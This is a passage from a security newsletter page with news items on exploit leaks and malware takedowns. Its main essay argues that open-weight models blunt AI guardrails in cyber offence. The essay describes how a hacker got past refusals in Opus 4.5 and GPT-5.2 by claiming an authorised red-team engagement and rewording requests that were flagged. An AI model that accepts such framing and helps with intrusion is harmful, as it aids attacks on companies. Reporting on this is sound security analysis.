max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 39:08 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Between Two Nerds: Set cyberspace ablaze&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <p><em>Or watch it on YouTube!</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/bcPvPCEnLSM?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Between Two Nerds: How to set cyberspace ablaze"></iframe></figure><h2 id="from-risky-bulletin">From <a href="https://news.risky.biz/tag/risky-bulletin/"><em><u>Risky Bulletin</u></em></a>:</h2><p><strong>Researcher drops giant cache of zero-day exploits:</strong> An anonymous security researcher going online by the pseudonym of Bikini has published proof-of-concept exploit code and detailed write-ups for more than a dozen zero-day vulnerabilities in popular open-source projects.</p><p>The exploits were <a href="https://github.com/bikini/exploitarium"><u>published</u></a> without notifying any of the vendors.</p><p>They impact 15 software projects, including some big names like the Linux kernel, Libssh2, Anydesk, FFmpeg, Gogs, Gitea, Ghidra, 7-Zip, MyBB, PHP, OpenVPN, the VLC player, and more.</p><p>[<a href="https://news.risky.biz/risky-bulletin-researcher-drops-giant-cache-of-zero-day-exploits/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>Microsoft disrupts StegoAd operation:</strong> Microsoft&apos;s security team has removed 119 malicious Edge extensions from the official Microsoft Edge Add-ons store that were part of a coordinated operation that sought to steal user credentials, backdoor browsers, and engage in advertising and search affiliate fraud.</p><p>The extensions were published through 90+ different developer accounts but shared infrastructure, parts of their codebase, and heavily relied on steganography to hide malicious commands and code.</p><p>The StegoAd operation, as Microsoft called it, also had Chrome and Firefox extensions under its umbrella.</p><p>[<a href="https://news.risky.biz/risky-bulletin-microsoft-disrupts-stegoad-operation/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>Law enforcement agencies and security firms take down Amadey and StealerC: </strong>An Europol operation aimed at taking down cybercrime operations has added two new victims to its trophy wall in the Amadey malware loader and the StealC infostealer operation. (Technically three, but we already covered the SocGolish botnet takedown last week, so we&apos;re gonna pretend it&apos;s two.)</p><p>The takedown included seven law enforcement agencies (from <a href="https://www.europol.europa.eu/media-press/newsroom/news/global-cyber-strike-disrupts-socgholish-amadey-and-stealc-malware-networks"><u>Europol</u></a>, Canada, Denmark, Germany, <a href="https://www.politie.nl/nieuws/2026/juni/24/11-operatie-endgame-opnieuw-twee-infostealers-offline.html"><u>the Netherlands</u></a>, the UK, and the US) and six security firms (<a href="https://blogs.microsoft.com/on-the-issues/2026/06/24/scaling-cybercrime-disruption-through-innovation-and-ai/"><u>Microsoft</u></a>, <a href="https://www.bitsight.com/blog/bitsight-aids-disruption-efforts-on-amadey-malware-and-stealc-malware"><u>Bitsight</u></a>, <a href="https://www.eset.com/us/about/newsroom/research/eset-takes-part-in-operation-endgame-disrupt-amadey-botnet-and-stealc-infostealer/"><u>ESET</u></a>, <a href="https://www.ibm.com/think/x-force/stealc-you-later-proofpoint-x-force-support-operation-endgame-disruptions"><u>IBM</u></a>, Proofpoint, <a href="https://www.mbsd.jp/news/20260624/news01/"><u>MBSD</u></a>, and Pillsbury).</p><p>Takedown figures include 326 servers, 142 domains, and more than $47 million in illegal cryptocurrency profits.</p><p>[<a href="https://news.risky.biz/risky-bulletin-law-enforcement-agencies-and-security-firms-take-down-amadey-and-stealerc/"><u>more</u></a> on <em>Risky Bulletin</em>]</p>
  104. Srsly Risky Biz: Open Weight Model Advances Make the Mythos Debate Moot

    Thu, 25 Jun 2026 08:42:31 -0000

    <p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Patrick Gray and Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://trailofbits.com/"><em><u>Trail of Bits</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in</em></p>
    <img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/06/data-src-image-0e31abf1-c3ad-4fab-b7b0-abd2d5d07649-1.jpeg" alt="Srsly Risky Biz: Open Weight Model Advances Make the Mythos Debate Moot"><p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Patrick Gray and Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://trailofbits.com/"><em><u>Trail of Bits</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via </em><a href="https://risky.biz/feeds/risky-business-news/"><em><u>this RSS feed</u></em></a><em>.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/SRB172.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/SRB172/&quot;&gt;Srsly Risky Biz: Open weight models make the Mythos debate moot&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 28:28 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Srsly Risky Biz: Open weight models make the Mythos debate moot&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <h2 id="srsly-risky-biz-open-weight-model-advances-make-the-mythos-debate-moot">Srsly Risky Biz: Open Weight Model Advances Make the Mythos Debate Moot</h2><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/06/data-src-image-0e31abf1-c3ad-4fab-b7b0-abd2d5d07649.jpeg" class="kg-image" alt="Srsly Risky Biz: Open Weight Model Advances Make the Mythos Debate Moot" loading="lazy" width="2000" height="1483" srcset="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w600/2026/06/data-src-image-0e31abf1-c3ad-4fab-b7b0-abd2d5d07649.jpeg 600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1000/2026/06/data-src-image-0e31abf1-c3ad-4fab-b7b0-abd2d5d07649.jpeg 1000w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1600/2026/06/data-src-image-0e31abf1-c3ad-4fab-b7b0-abd2d5d07649.jpeg 1600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/06/data-src-image-0e31abf1-c3ad-4fab-b7b0-abd2d5d07649.jpeg 2048w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Photo by</span><a href="https://unsplash.com/@nypl?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">The New York Public Library</span></u></a><span style="white-space: pre-wrap;"> on</span><a href="https://unsplash.com/photos/a-soldier-a-seated-woman-and-a-flying-figure-OuUWfiMrSjg?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">Unsplash</span></u></a></figcaption></figure><p>This week, the Five Eyes cyber security agencies <a href="https://www.cisa.gov/news-events/news/five-eyes-cyber-security-agencies-statement"><u>issued a call-to-action</u></a>, warning that AI is accelerating &quot;the speed, scale, and sophistication of cyber threats&quot;.&#xA0;</p><p>The thinking behind the call-to-action is clear, here. The Five Eyes believe it is no longer possible to limit AI&apos;s powerful, offensive cyber security capabilities to benign actors. AI is lowering barriers for malicious actors and shrinking the window between vulnerability discovery and exploitation. Organisations need to be ready, because the genie is out of the bottle.</p><p>They&apos;re not wrong. Freely available <a href="https://opensource.org/ai/open-weights"><u>open weights models</u></a> have closed the gap with frontier models to the extent that they&apos;re now extremely useful in orchestrating various offensive cyber security tasks.&#xA0;</p><p>A recent independent <a href="https://arxiv.org/abs/2604.03121"><u>safety evaluation</u></a> of the Chinese-made Kimi 2.5 model, for example, compared it to Anthropic&apos;s Opus 4.5 and OpenAI&apos;s GPT-5.2, the frontier models available at the time of its release. They found Kimi &quot;performs competitively on structured cyber security tasks&quot;, even if it was not as good at vulnerability discovery and exploitation.</p><p>Opus 4.5 and GPT-5.2, were released in <a href="https://www.anthropic.com/news/claude-opus-4-5"><u>late November</u></a>&#xA0; and <a href="https://openai.com/index/introducing-gpt-5-2/"><u>mid-December</u></a> respectively, while Kimi 2.5 was <a href="https://techcrunch.com/2026/01/27/chinas-moonshot-releases-a-new-open-source-model-kimi-k2-5-and-a-coding-agent/"><u>released in late January</u></a>.&#xA0;</p><p>So Kimi wasn&apos;t as capable, but these free and open models <em>are</em> getting better, and quickly.&#xA0;</p><p>There have been updates since. Kimi 2.7 Code was <a href="https://www.kimi.com/resources/kimi-k2-7-code"><u>released last week</u></a>, and while we haven&apos;t seen an independent evaluation, we expect that improved coding performance will also mean that it is better at some cyber security tasks.</p><p>Vulnerability researchers are also getting better at using open weight models to find bugs, even when they aren&apos;t as capable as the bleeding edge frontier releases. See <a href="https://www.youtube.com/watch?v=ksWbjE9uQyk"><u>this interview</u></a> with Niels Provos about his work, or read <a href="https://srlabs.de/blog/beyond-fable"><u>this post</u></a> from noted researcher Karsten Nohl.</p><p>So while it&apos;s not the case that threat actors can just ask open weight models to go and conduct completely automated campaigns, it <em>is</em> the case that for expert users, open weight models are accelerating offensive workflows and vulnerability discovery.</p><p>In the workflow case, a report <a href="https://research.openanalysis.net/claude/codex/hacking/ai%20hacking/llm/redteam/policy%20violation/2026/06/16/compromised-claude-hacking.html"><u>released last week</u></a> from OALABS Research describes how a single hacker leveraged Opus 4.5 and GPT-5.2 to hack at least 14 companies in partially automated attacks.&#xA0;</p><p>OALABS was given a copy of the hacker&apos;s working directory on a compromised host he was launching attacks from. Although AI helped him to hack a number of companies, he was not exactly savvy. His OPSEC was poor. He even edited his resume on this compromised server. OALABS said this revealed his &quot;full name, location, education history, and even his LinkedIn profile, revealing him to be a young man living in Addis Ababa, Ethiopia&quot;.&#xA0;</p><p>And yet, despite his questionable skill level, the attacker was still quite successful. Per OALABS:</p><blockquote>What stands out most is how little the attacker needed to provide to get meaningful results. In many cases, the attacker supplied only vague, low-skill prompts and allowed Claude to fill in the gaps: researching exposed services, identifying possible vulnerabilities, writing exploit code, validating access, and harvesting data. The attacker did not need to be an expert operator; they simply had to use the correct framing for their prompts. The agent supplied much of the structure and technical execution that the attacker appeared to lack.</blockquote><p>Opus 4.5 and GPT-5.2 were used in this example. They&apos;re not frontier models anymore and the hacker in this case could easily achieve the same level of automation now with something like Qwen 3.6, a locally-hosted model.&#xA0;</p><p>Straightforward, workaday hacking does not require frontier models anymore. Open weight models also come with the added benefit of ineffective and easy to remove guardrails.</p><p>It&apos;s easy to put too much emphasis on guardrails, however. In this case, the hacker was using notionally &quot;safer&quot; models with more robust guardrails than something like Kimi or Qwen, but he still received very little pushback. The hacker framed his requests as occurring in an authorised red team engagement. In more than 1,000 sessions, GPT-5.2 flagged only <em>one</em> usage policy violation and Opus 4.5 just nine. When these queries were flagged, the hacker simply worded his requests less aggressively and emphasised he was authorised to complete the work. This strategy worked for all of the hacker&apos;s queries.&#xA0;</p><p>This case study isn&apos;t necessarily a demonstration that safeguards are ineffective. Rather, it emphasises that it&apos;s impossible to tell the difference between legitimate cyber security work and criminal hacking without additional context. The only way to know if an activity is benign or malicious is to understand the user&apos;s intent.&#xA0;&#xA0;</p><p>So, what are policymakers to do in response to the Five Eyes call-to-action? Obviously, forcing the frontier model providers to slap extreme guardrails on their products won&apos;t get us very far.&#xA0;</p><p>The policy response here has to be about preparing us for a world where everyone has a Mythos 5.0-level model running locally, on a computer on their desk. In that world, governments will need to focus less on mandating strong guardrails and slapping export bans on frontier models, and more on trying to tighten cyber security across government and private sector systems. That&apos;s going to be a heavy lift, but trying to stop bad actors getting their hands on dangerous models is an unwinnable battle.</p><p>The Five Eyes cyber security authorities are right: The AI genie is out of the bottle.&#xA0;</p><h2 id="why-cybercrime-takedowns-are-like-mowing-the-lawn">Why Cybercrime Takedowns Are Like Mowing the Lawn</h2><p>Last week the multinational joint law enforcement initiative known as Operation Endgame announced <a href="https://operation-endgame.com"><u>it had disrupted</u></a> the SocGholish botnet.&#xA0;</p><p>The SocGholish network used compromised WordPress sites to spread malware that purported to be software updates. This malware provided criminals with access to victim computers and was often used for follow-on ransomware attacks.</p><p>Endgame says it took down 106 servers and domains. In addition, Dutch police removed backdoors and malware from 14,971 WordPress sites that were being used to distribute malware.&#xA0;</p><p>That&apos;s another big trophy to add to Endgame&apos;s collection. Since it kicked off in 2024, it has disrupted <a href="https://krebsonsecurity.com/2024/05/operation-endgame-hits-malware-delivery-platforms/"><u>malware delivery platforms</u></a>, <a href="https://cyberscoop.com/operation-endgame-ransomware-infrastructure-takedown-europol/"><u>ransomware infrastructure</u></a>, and <a href="https://therecord.media/operation-endgame-cybercrime-takedowns-rhadamanthys-venomrat-elysium"><u>infostealer networks</u></a>. The sheer number of <a href="https://www.europol.europa.eu/media-press/newsroom/news/largest-ever-operation-against-botnets-hits-dropper-malware-ecosystem"><u>criminal</u></a> services <a href="https://www.europol.europa.eu/media-press/newsroom/news/operation-endgame-strikes-again-ransomware-kill-chain-broken-its-source"><u>disrupted</u></a> is <a href="https://www.europol.europa.eu/media-press/newsroom/news/end-of-game-for-cybercrime-infrastructure-1025-servers-taken-down"><u>impressive</u></a>.&#xA0;</p><p>Despite some significant wins, the celebrations don&apos;t always last. Many of these services have bounced back, some quite rapidly.</p><p>The Bumblebee malware loader was disrupted in May 2024 but had <a href="https://www.bleepingcomputer.com/news/security/bumblebee-malware-returns-after-recent-law-enforcement-disruption/"><u>reappeared by October</u></a> of that year. Similarly, <a href="https://www.technadu.com/systembc-infections-exceed-10000-including-systems-linked-to-government-hosting/619549/"><u>SystemBC</u></a> reappeared within three months and <a href="https://www.bleepingcomputer.com/news/security/danabot-malware-is-back-to-infecting-windows-after-6-month-break/"><u>DanaBot malware</u></a> within six<strong>.&#xA0;</strong></p><p>It is disheartening when services return, but when there is big money on the line criminal enterprises have proven to be quite resilient. That doesn&apos;t mean these operations are failures, though. Even when criminal services are able to bounce back relatively quickly, the disruptions do have long-lasting impacts.</p><p>Take Operation Endgame&apos;s impact on the Rhadamanthys infostealer malware, for example, as <a href="https://www.proofpoint.com/us/blog/threat-insight/operation-endgame-quakes-rhadamanthys"><u>examined by Proofpoint.</u></a></p><p>Rhadamanthys initially <em>benefited</em> as other malware strains were taken down and criminals migrated to it, before it itself was taken down in November 2025, leaving its customers searching for alternatives.&#xA0;</p><p>Newer alternatives were available, but Proofpoint noted that criminals still had to spend time and effort retooling their attack chains to deal with the disruption. And when criminal groups rebuild infrastructure, Operation Endgame has sometimes come back for a second round. In May 2025 it took on Trickbot and Bumblebee, two malware variants that it had previously disrupted. Constant contact!</p><p>There are indirect benefits to increased law enforcement &quot;presence&quot;, too. Per Proofpoint, these types of actions &quot;sow distrust among the criminal ecosystem&quot;, generating friction and resulting in criminals imposing &quot;more restrictive policies and tighter controls about who can buy malware from certain brokers&quot;.&#xA0;</p><p>Operation Endgame describes its activities as <a href="https://operation-endgame.com/seasons/"><u>different &quot;seasons&quot;</u></a>, but we don&apos;t think it&apos;s quite the right analogy. Disrupting cybercriminal networks is more like maintaining a lawn: You simply have to keep mowing.</p><p><em>Watch James Wilson and Tom Uren discuss this edition of the newsletter:</em></p><h2 id="three-reasons-to-be-cheerful-this-week">Three Reasons to Be Cheerful This Week:</h2><ol><li><strong>Android developer verification is coming:</strong> <a href="https://android-developers.googleblog.com/2026/06/android-developer-verification.html"><u>Starting in September this year</u></a> all Android Apps on the Google Play and six other app stores will need to come from verified accounts. The plan is to extend verification worldwide in 2027.</li><li><strong>London SMS blaster ringleader sentenced:</strong> A 43-year-old Chinese national, Di Li, <a 